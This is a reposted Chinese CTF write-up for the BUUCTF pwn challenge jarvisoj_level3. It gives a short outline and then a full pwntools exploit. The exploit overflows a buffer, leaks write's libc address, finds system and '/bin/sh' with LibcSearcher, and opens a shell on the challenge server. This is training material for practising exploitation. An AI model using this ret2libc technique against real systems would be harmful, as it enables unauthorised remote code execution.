[BUUCTF-pwn]——jarvisoj_level302-21
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——jarvisoj_level302-21
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——jarvisoj_level3
- 題目地址: https://buuoj.cn/challenges#jarvisoj_level3
以前好像寫過這個題, 就不詳細寫了。有興趣的可以去之前的博客翻一下, 就在BUU和OJ 里面
大致思路, 泄露出一個地址, 找到對應的libc版本。計算偏移找到system和’/bin/sh’
exploit
from pwn import * from LibcSearcher import *p = remote("node3.buuoj.cn",27068) elf = ELF("./level3") #gdb.attach(p, "b *0x08048482") write_got = elf.got['write'] write_plt = elf.plt['write']main = 0x0804844Bpayload = 'a' * (0x88 + 0x4) + p32(write_plt) + p32(main) + p32(1) + p32(write_got) + p32(8)p.sendafter("Input:\n", payload) write_addr = u32(p.recv(4)) print hex(write_addr)libc = LibcSearcher("write", write_addr) libc_base = write_addr - libc.dump("write") sys_addr = libc_base + libc.dump("system") binsh = libc_base + libc.dump("str_bin_sh")payload = 'a' * (0x88 + 0x4) + p32(sys_addr) + p32(0) + p32(binsh) p.sendlineafter("Input:\n", payload) p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——jarvisoj_level302-21的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [攻防世界 pwn]——pwn-100
- 下一篇: [BUUCTF-pwn]——[Black